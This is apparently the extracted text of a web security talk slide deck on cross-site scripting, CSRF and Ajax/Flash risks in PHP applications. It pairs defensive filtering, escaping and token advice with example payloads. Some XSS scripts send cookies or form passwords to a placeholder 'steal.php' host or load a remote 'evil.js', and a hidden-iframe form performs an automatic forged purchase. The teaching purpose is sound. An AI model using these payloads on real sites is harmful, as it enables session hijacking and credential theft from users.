Security 2.

0
Chris Shiflett Principal, OmniTI chris@omniti.com 1

1

Talk Outline
‣ ‣ ‣ ‣ ‣ ‣
What Is Web 2.0? Cross-Site Scripting Cross-Site Request Forgeries Attack Mashups Live Demo? Questions and Answers
2

2

What Is Web 2.0?
Web 1.0 DoubleClick Ofoto Britannica Online Personal Web Sites Screen Scraping Directories (Taxonomy) Web 2.0 Google AdSense Flickr Wikipedia Blogs Web Services Tagging (Folksonomy)
3

3

Cross-Site Scripting

A

ATTACKER TARGET

VICTIM

4

4

Cross-Site Scripting

HTML Attacker XSS Target XSS Victim

5

5

Cross-Site Scripting
echo $_GET['user'];

http://host/script.php?user=%3Cscript%3E...

echo '<script>...';

6

6

Stealing Cookies

<script> document.location = 'http://host/steal.php?cookies=' + encodeURI(document.cookie); </script>

7

7

Stealing Passwords

<script> document.forms[0].action = 'http://host/steal.php'; </script>

8

8

Stealing Saved Passwords
<form name="steal" action="http://host/steal.php"> <input type="text" name="username" style="display: none" /> <input type="password" name="password" style="display: none" /> <input type="image" src="image.png" /> </form>
9

9

Keeping It Short

<script src="http://host/evil.js"> </script>

10

10

Character Encoding Consistency
<?php header('Content-Type: text/html; charset=UTF-7'); $string = "<script>alert('XSS');</script>"; $string = mb_convert_encoding($string, 'UTF-7'); echo htmlentities($string); ?>

11

11

FIEO
PHP

FILTER

BUSINESS LOGIC

ESCAPE

12

12

<?php $clean = array(); if (preg_match('/^\d{5}$/', $_POST['zip'])) {     $clean['zip'] = $_POST['zip']; } else {     /* Error */ } ?>
13

13

<?php /* Content-Type: text/html; charset=UTF-8' */ $html = array(); $html['user'] = htmlentities($clean['user'], ENT_QUOTES, 'UTF-8'); echo "<p>Welcome, {$html['user']}.</p>"; ?>
14

14

Escaping
echo htmlentities('<script>', ENT_QUOTES, 'UTF-8');

&lt;script&gt;

<script>

15

15

Cross-Site Request Forgeries

CSRF ATTACK VICTIM TARGET

16

16

CSRF

<form action="buy.php" method="POST"> <input type="hidden" name="isbn" value="059600656X" /> <input type="submit" value="BUY" /> </form>
BUY

17

17

CSRF
<img src="http://host/buy.php?isbn=059600656X" />

GET /buy.php?isbn=059600656X HTTP/1.1 Host: host Cookie: PHPSESSID=1234

18

18

CSRF
<iframe style="visibility: hidden" name="secret"></iframe> <form name="buy" action="http://host/buy.php" method="POST" target="secret"> <input type="hidden" name="isbn" value="059600656X" /> </form> <script type="text/javascript">document.buy.submit();</script>

POST /buy.php HTTP/1.1 Host: host Cookie: PHPSESSID=1234 Content-Type: application/x-www-form-urlencoded Content-Length: 15 isbn=059600656X 19

19

Stealing Cookies

<script> new Image().src = 'http://host/steal.php?cookies=' + encodeURI(document.cookie); </script>

20

20

One-Time Tokens
$token = md5(uniqid(rand(), TRUE)); $_SESSION['token'] = $token; $html['token'] = htmlentities($token, ENT_QUOTES, 'UTF-8');

<input type="hidden" name="token" value="<?php echo $html['token']; ?>" />
21

21

Ajax

"The name is shorthand for Asynchronous JavaScript + XML, and it represents a fundamental shift in what’s possible on the Web." Jesse James Garrett adaptivepath.com

22

22

Ajax

‣ ‣

Ajax has sparked a renewed interest in JavaScript. Most XSS attacks utilize JavaScript.

23

23

Ajax

‣ ‣ ‣

XSS + Ajax avoids the JavaScript security sandbox. This has catastrophic consequences. It's also why cross-domain Ajax would be dangerous.

24

24

XSS + Ajax + CSRF
Victim
XMLHttpRequest HTML Form + Victim's Token XMLHttpRequest + Victim's Token

XSS

Target

25

25

Cross-Domain Ajax
‣ ‣ ‣
There are several ways to send cross-domain Ajax requests. Most do not avoid the JavaScript security sandbox, but instead work around it. But, true cross-domain Ajax is possible with Flash.

26

26

Cross-Domain Ajax

<cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy>

27

27

Cross-Domain Ajax with Flash
"Why should I care about Flash? We don't use Flash."

‣ ‣ ‣

The browsers that your users use are Flash-capable. Some of the most dangerous emerging risks are those that target your users. Your users become not only victims, but also accomplices.
28

28

More Information
‣ ‣ ‣ ‣
http://shiflett.org/ http://omniti.com/ http://phpsec.org/ http://phpsecurity.org/

29

29